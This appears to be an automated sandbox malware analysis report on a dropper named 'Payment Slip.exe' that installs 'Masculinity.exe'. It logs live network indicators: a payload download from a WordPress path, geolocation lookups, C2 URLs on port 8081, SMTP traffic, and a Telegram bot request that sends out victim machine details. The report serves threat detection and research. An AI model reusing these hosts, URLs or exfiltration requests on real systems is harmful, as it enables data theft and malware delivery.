Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then push 00000000h	7_2_04E854CF
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_04E808DE
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_04E80960
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_04E80D26
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_04E80A10

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.5:49734 -> 66.29.159.53:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20and%20Time:%2027/07/2024%20/%2007:40:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20374653%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: global traffic

TCP traffic: 192.168.2.5:49734 -> 66.29.159.53:587

Source: global traffic	HTTP traffic detected: GET /wp-includes/MGGxuAN14.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49717 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wp-includes/MGGxuAN14.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20and%20Time:%2027/07/2024%20/%2007:40:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20374653%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: www.reap.skyestates.com.mt
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: smtp.privateemail.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 25 Jul 2024 08:06:02 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/8
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3275528643.0000000004B39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3290148759.0000000023700000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3275528643.0000000004B39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: Payment Slip.exe, Masculinity.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3275528643.0000000004B39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000002.00000002.2671509401.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Payment Slip.exe, Masculinity.exe.2.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Payment Slip.exe, Masculinity.exe.2.dr	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000002.00000002.2671509401.00000000046D1000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtp.privateemail.com
Source: Payment Slip.exe, Masculinity.exe.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Payment Slip.exe, Masculinity.exe.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Payment Slip.exe, Masculinity.exe.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000002.00000002.2671509401.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2671509401.00000000046D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBcq
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20a
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Masculinity.exe, 00000007.00000002.3286769966.000000002101E000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.000000002100F000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.000000002104F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000021019000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlBcq
Source: powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Payment Slip.exe, Masculinity.exe.2.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: Payment Slip.exe, Masculinity.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: Payment Slip.exe, Masculinity.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000002.00000002.2671509401.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020EAE000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020F1D000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020EAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F1D000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020ED8000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Masculinity.exe, 00000007.00000002.3286769966.000000002104F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: Masculinity.exe, 00000007.00000002.3286769966.000000002104A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lBcq
Source: Masculinity.exe, 00000007.00000002.3275528643.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.reap.skyestates.com.mt/
Source: Masculinity.exe, 00000007.00000002.3275528643.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3285985149.000000001FE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/MGGxuAN14.bin

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49733 version: TLS 1.2

Source: C:\Users\user\Desktop\Payment Slip.exe

Code function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052D1

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Payment Slip.exe

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Masculinity.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Payment Slip.exe	Code function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		0_2_00403358
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		7_2_00403358

Source: C:\Users\user\Desktop\Payment Slip.exe	Code function: 0_2_00404B0E	0_2_00404B0E
Source: C:\Users\user\Desktop\Payment Slip.exe	Code function: 0_2_0040653D	0_2_0040653D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_042AEAD8	2_2_042AEAD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_042AF3A8	2_2_042AF3A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_042AE790	2_2_042AE790
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_00404B0E	7_2_00404B0E
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0040653D	7_2_0040653D
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015C19B	7_2_0015C19B
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015D2CD	7_2_0015D2CD
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_00155362	7_2_00155362
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015C468	7_2_0015C468
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015D599	7_2_0015D599
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015C738	7_2_0015C738
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_001569A0	7_2_001569A0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_001529E0	7_2_001529E0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015CA08	7_2_0015CA08
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015EC18	7_2_0015EC18
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_00159DE0	7_2_00159DE0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_00156FC8	7_2_00156FC8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015CFF8	7_2_0015CFF8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015F804	7_2_0015F804
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015EC0C	7_2_0015EC0C
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015FC50	7_2_0015FC50
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_00153E09	7_2_00153E09
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A69590	7_2_04A69590
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A62970	7_2_04A62970
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A69E80	7_2_04A69E80
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A62288	7_2_04A62288
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A65290	7_2_04A65290
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6FA78	7_2_04A6FA78
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A61BA8	7_2_04A61BA8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A60B30	7_2_04A60B30
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6CF08	7_2_04A6CF08
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6E4B1	7_2_04A6E4B1
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6E4BF	7_2_04A6E4BF
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6E4C0	7_2_04A6E4C0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A60007	7_2_04A60007
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6DC01	7_2_04A6DC01
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6DC10	7_2_04A6DC10
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6E067	7_2_04A6E067
